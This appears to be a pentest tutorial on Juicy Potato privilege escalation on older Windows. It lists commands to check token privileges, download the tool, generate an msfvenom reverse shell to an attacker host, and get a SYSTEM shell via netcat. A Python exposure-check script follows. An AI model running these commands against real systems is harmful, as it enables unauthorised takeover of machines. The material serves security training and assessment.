# Introduction

Service accounts are often configured with `SeImpersonatePrivilege` or `SeAssignPrimaryTokenPrivilege`. These privileges allow an account to impersonate the access tokens of other users, including the SYSTEM user.

**Important:** Juicy Potato does not work on Windows 10 version 1809 or later, nor on Server 2019. For Server 2016, Server 2019, and Windows 10 (1607 onwards), use PrintSpoofer.exe instead.
# Exploiting privileges with Juicy Potato

Rotten Potato was a limited exploit. Juicy Potato improves on it by leveraging more CLSIDs and methods of exploitation. (The following example uses Windows 7.)
- Verify that the current user has `SeImpersonatePrivilege`:

  ```
  whoami /priv
  ```

- Download `JuicyPotato.exe` from GitHub:

  ```
  curl -L -o JuicyPotato.exe https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe
  ```

  Note: This binary is 64-bit. A 32-bit version is available here.

- Determine the OS version and build:

  ```
  systeminfo | findstr /B /C:"Host Name" /C:"OS Name" /C:"OS Version" /C:"System Type" /C:"Hotfix(s)"
  ```

  Example: Windows 10 Professional, Build 10586 → Version 1511. Since 1511 < 1809, the machine is potentially vulnerable if not patched.

- Generate a reverse shell executable using `msfvenom` (or use `nc.exe`):

  ```
  msfvenom -p windows/x64/shell_reverse_tcp LHOST=[IP-ADDRESS] LPORT=1234 -a x64 --platform Windows -f exe -o shell.exe
  ```

- Transfer `JuicyPotato.exe` and `shell.exe` to the target (see the File Transfer section for techniques).

- Test the exploit by redirecting output to a file:

  ```
  C:\Users\Public\Downloads\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c whoami > C:\Users\Public\Downloads\output.txt" -t *
  ```

- Start a Netcat listener and execute the reverse shell via Juicy Potato:

  ```
  C:\Users\Public\Downloads\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c C:\Users\Public\Downloads\shell.exe" -t *
  ```

- If successful, you'll receive a SYSTEM shell on the listener:

  ```
  sudo rlwrap -cAr nc -lvnp 1234
  ```
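As an added triage check (not code from the original page or the Juicy Potato project), the following Python parses saved `whoami /priv` and `systeminfo` output, constructed here as sample strings, and reports whether a host sits in the range the steps above rely on: one of the two token privileges present and a build earlier than 17763 (version 1809). The build-to-version table covers the Windows 10 releases up to 1809.

```python
import re

# Constructed sample output in the shape of `whoami /priv` and `systeminfo`
# (not captured from a real host).
WHOAMI_PRIV = """\
Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Disabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
"""
SYSTEMINFO = """\
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.10586 N/A Build 10586
System Type:               x64-based PC
"""

# Windows 10 feature-update builds; 17763 (1809 / Server 2019) is the first
# release on which Juicy Potato no longer works.
BUILD_TO_VERSION = {10240: "1507", 10586: "1511", 14393: "1607", 15063: "1703",
                    16299: "1709", 17134: "1803", 17763: "1809"}
FIRST_FIXED_BUILD = 17763
TOKEN_PRIVS = ("SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege")


def parse_privileges(text):
    """Map privilege name -> state from `whoami /priv` output."""
    privs = {}
    for line in text.splitlines():
        m = re.match(r"^(Se\w+Privilege)\s+.*\s(Enabled|Disabled)\s*$", line)
        if m:
            privs[m.group(1)] = m.group(2)
    return privs


def parse_build(text):
    """Return the build number from the 'OS Version:' line of `systeminfo`."""
    m = re.search(r"^OS Version:\s+\d+\.\d+\.(\d+)", text, re.MULTILINE)
    return int(m.group(1)) if m else None


def assess(whoami_text, systeminfo_text):
    """Flag the host when a relevant token privilege is present (Enabled or
    Disabled: a disabled privilege can still be enabled by the process
    holding it) and the build predates 1809."""
    privs = parse_privileges(whoami_text)
    build = parse_build(systeminfo_text)
    held = [p for p in TOKEN_PRIVS if p in privs]
    pre_1809 = build is not None and build < FIRST_FIXED_BUILD
    return {"privileges": held, "build": build,
            "version": BUILD_TO_VERSION.get(build, "unknown"),
            "exposed": bool(held) and pre_1809}
```

Feed it the saved output of the two commands from a live host; the sample deliberately lists `SeImpersonatePrivilege` as Disabled to show that state alone does not clear a host.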